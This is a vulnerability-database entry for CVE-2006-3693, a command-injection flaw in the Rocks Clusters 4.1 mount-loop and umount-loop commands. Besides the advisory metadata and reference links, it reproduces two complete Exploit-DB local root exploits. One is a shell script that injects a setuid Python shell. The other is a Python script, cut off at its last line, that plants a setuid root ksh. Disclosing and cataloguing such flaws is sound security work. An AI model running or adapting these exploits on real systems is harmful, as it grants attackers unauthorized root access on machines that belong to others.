CVE-2006-3693
Published 2006-07-21
Priority: P4 · 21 · medium · 4.6 (CVSS 2.0)
Vector: AV:L/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.93% (56.2th percentile)
Rocks Clusters 4.1 and earlier allows local users to gain privileges via commands enclosed with escaped backticks (\`) in an argument to the (1) mount-loop (mount-loop.c) or (2) umount-loop (umount-loop.c) command, which is not filtered in a system function call.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rocks_clusters | rocks_clusters | <= 4.1 | — |
No detection rules found.
Exploit-DB
Rocks Clusters 4.1 - 'mount-loop' Local Privilege Escalation
exploitdb·2006-07-15
```sh
#!/bin/sh
##############################################################################
## rocksmountdirty.sh: Rocks release <=4.1 local root exploit
## make sure 'mount-loop' is in your path for this to work.
##
## coded by: [email protected] [http://xavsec.blogspot.com]
##############################################################################
echo "Rocks Clusters <=4.1 mount-loop local root exploit by [email protected] [http://xavsec.blogspot.com]"
echo "getting root.. goodluck"
mount-loop "null" "null" "null; python -c 'import os;os.setuid(0);os.setgid(0);os.execl(\"/bin/sh\", \"/usr/sbin/httpd\")'"
# milw0rm.com [2006-07-15]
```
Exploit-DB
Rocks Clusters 4.1 - 'umount-loop' Local Privilege Escalation
exploitdb·2006-07-15
```python
#!/usr/bin/env python
##############################################################################
## rocksumountdirty.py: Rocks release <=4.1 local root exploit
## quick and nasty version of the exploit. make sure the . is writable and
## you clean up afterwards. ;)
##
## coded by: [email protected] [http://xavsec.blogspot.com]
##############################################################################
x=__import__('os');c=x.getcwd()
open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c))
print "Rocks Clusters <=4.1 umount-loop local root exploit by [email protected] [http://xavsec.blogspot.com]"
x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/s
```
No writeups or analysis indexed.
- http://secunia.com/advisories/21065
- http://securityreason.com/securityalert/1242
- http://www.securityfocus.com/archive/1/440126/100/0/threaded
- http://www.securityfocus.com/bid/19003
- http://www.vupen.com/english/advisories/2006/2833
- http://xavier.tigerteam.se/advisories/TSEAD-200606-6.txt
- http://xavier.tigerteam.se/exploits/rocksmountdirty.sh
- http://xavier.tigerteam.se/exploits/rocksumountdirty.py
- https://exchange.xforce.ibmcloud.com/vulnerabilities/27758